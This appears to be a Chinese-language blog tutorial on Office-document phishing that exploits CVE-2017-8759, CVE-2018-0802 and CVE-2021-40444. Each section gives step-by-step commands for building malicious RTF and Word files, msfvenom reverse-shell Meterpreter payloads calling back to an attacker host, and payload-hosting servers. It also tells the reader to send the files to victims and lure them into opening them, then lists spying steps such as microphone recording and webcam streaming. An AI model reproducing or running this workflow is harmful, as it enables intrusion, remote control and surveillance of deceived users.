社工钓鱼之Office钓鱼(上)

CVE-2017-8759

影响范围

• Microsoft .NET Framework 4.6.2
• Microsoft .NET Framework 4.6.1
• Microsoft .NET Framework 3.5.1
• Microsoft .NET Framework 4.7
• Microsoft .NET Framework 4.6
• Microsoft .NET Framework 4.5.2
• Microsoft .NET Framework 3.5
• Microsoft .NET Framework 2.0 SP2

漏洞概述

CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞，该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码，FireEye公司对该微软Office文档进行了分析，并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本，黑客在Offcie文档中嵌入新的Moniker对象，利用的是.net库漏洞，在Office文档中加载执行远程的恶意.NET代码

社工钓鱼

Step 1：利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件

python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.174.131/logo.txt

Step 2：利用msfvenom生成一个反弹shell的exe文件，命名为shell.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=4444 -f exe > /root/shell.exe

Step 3：监听来自木马文件执行后反弹的shell

python cve-2017-8759_toolkit.py -M exp -e http://192.168.174.131/shell.exe -l/root/shell.exe

Step 4：开启metasploit的监听模块进行监听，设置响应载荷以及监听IP

Step 5：将恶意rtf文件发送到靶机上，当恶意文件被执行后，msf监听到反弹shell，然后建立会话连接，即可获取靶机控制权

Step 6：后续利用

sysinfo 获取系统信息
getsystem 获取高权限
reg 修改注册表
record_mic 音频录制
webcam_stream 摄像头视频获取

CVE-2018-0802

影响范围

• Microsoft Office 2007 SP3
• Microsoft Office 2010 Service Pack 2 (32-bit editions)
• Microsoft Office 2010 Service Pack 2 (64-bit editions)
• Microsoft Office 2013 Service Pack 1 (32-bit editions)
• Microsoft Office 2013 Service Pack 1 (64-bit editions)
• Microsoft Office 2016 (32-bit edition)
• Microsoft Office 2016 (64-bit edition)
• Microsoft Office 2016 Click-to-Run (C2R) for 32-bit edition
• Microsoft Office 2016 Click-to-Run (C2R) for 64-bit edition
• Microsoft Office Compatibility Pack Service Pack 3
• Microsoft Word 2007 SP3
• Microsoft Word 2010 Service Pack 2 (32-bit editions)
• Microsoft Word 2010 Service Pack 2 (64-bit editions)
• Microsoft Word 2013 RT Service Pack 1
• Microsoft Word 2013 Service Pack 1 (32-bit editions)
• Microsoft Word 2013 Service Pack 1 (64-bit editions)
• Microsoft Word 2016 (32-bit edition)
• Microsoft Word 2016 (64-bit edition)

漏洞描述

2018年1月份出了一个新的"噩梦公式二代"，在野样本嵌入了利用Nday漏洞和0day漏洞的2个公式对象同时进行攻击，Nday漏洞可以攻击未打补丁的系统，0day漏洞则攻击全补丁系统，绕过了CVE-2017-11882补丁的ASLR(地址随机化)安全保护措施，攻击最终将在用户电脑中植入恶意的远程控制程序

漏洞复现

Step 1：下载EXP

https://github.com/Al1ex/Heptagram/tree/master/Windows%20Office/CVE-2018-0802

Step 2：打开MSF设置攻击IP，准备接受反弹shell

Step 3：执行exploit进行监听

Step 4：制作payload文档

Step 5：之后将exp.doc发送给用户并诱导用户打开

Step 6：之后即可成功反弹shell回来

CVE-2021-40444

影响范围

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 21H1 for x64-based Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 2004 for x64-based Systems

Windows 10 Version 2004 for ARM64-based Systems

Windows 10 Version 2004 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

漏洞概述

2021年9月8日，微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞，攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用，成功诱导用户打开恶意文档后，可在目标系统上以该用户权限执行任意代码，微软在通告中指出已检测到该漏洞被在野利用，请相关用户采取措施进行防护。

MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎，也用于Office应用程序，以在Word、Excel或PowerPoint文档中呈现Web托管的内容，AcitveX控件是微软COM架构下的产物，在Windows的Office套件、IE浏览器中有广泛的应用，利用ActiveX控件即可与MSHTML组件进行交互。

简易测试

Step 1：安装依赖

sudo apt-get install lcab

Step 2：执行以下命令生成恶意载荷并更新用于托管载荷的地址信息

python3 exploit.py generate test/calc.dll http://<SRV IP>

Step 2：启动服务托管载荷

python3 exploit.py host 80

Step 4：将out文件夹下的word发送给受害者用户点击，之后成功弹出计算器

请求记录如下：

社工钓鱼

Step 1：使用Msfvenom生成恶意载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f dll > shell.dll

Step 2：用shell.dll添加到test目录下

Step 3：执行以下命令生成恶意载荷并更新用于托管载荷的地址信息

python3 exploit.py generate test/shell.dll http://192.168.174.128

Step 4：使用MSF监听载荷

Step 5：启动服务托管载荷

Step 6：将恶意docx文件发送给受害者主机并诱导其打开

请求记录：

之后成功获取到Shell

文末小结

本篇文章对Office钓鱼进行了简单介绍，从上面可以发现在Office钓鱼中大部分情况都需要用户进行交互，例如：点击启用宏或者更新数据文档，这无疑会增加用户的怀疑，在社工钓鱼中药特别注意